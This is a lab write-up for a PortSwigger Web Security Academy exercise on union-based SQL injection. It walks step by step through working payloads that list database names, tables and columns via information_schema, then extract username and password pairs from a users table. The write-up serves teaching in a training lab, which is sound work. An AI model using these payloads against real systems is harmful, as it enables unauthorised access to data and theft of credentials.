SQL injection UNION attack, retrieving data from other tables

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables

Level: Practitioner

• In this lab I will be showing how to get columns, tables and databases using a union-based attack.

• First, we need to know the number of columns that are in the table that we are using.

• You can do this as is in the following image, or you can use order by either.

• To get all the databases name, use the following payload.

• ' Union select schema_name,NULL from information_schema.schemata-- -

In a simple break down in this expression this is what it means:

• Information_schema.schemata - list me the DB names.

• schema_name - get me back the DB names.

• Now that we know the DB name that we want, we need to get the names of the tables.

• Use the following payload to retrieve the name of the tables.

• ' Union select table_name,NULL from information_schema.tables where table_schema = 'DB_NAME' -- -

Breakdown

• information_schema.tables - list me all the tables.

• table_name - get me back the name of the tables.

• table_schema - name of the database we want to use.

• Now we use the following payload to get the columns of the table that we want.

• ' Union select column_name,NULL from information_schema.columns where table_name = 'TABLE_NAME' -- -

Breakdown

• column_name - get me the names of the columns.

• information_schema.columns - list me all the columns.

• table_name - this is to select the table that we want to get info.

• Now that we know the columns that we want to extract data, I like to use the following.

• ' Union select NULL,username||':'||password from users -- -

Breakdown

• username||':'||password - this to represent the data in a better way.

*Important*

If you don't understand the SQL logic and the way on how to write one, I recommend to practice in a virtual lab where you make the DB and break it by yourself.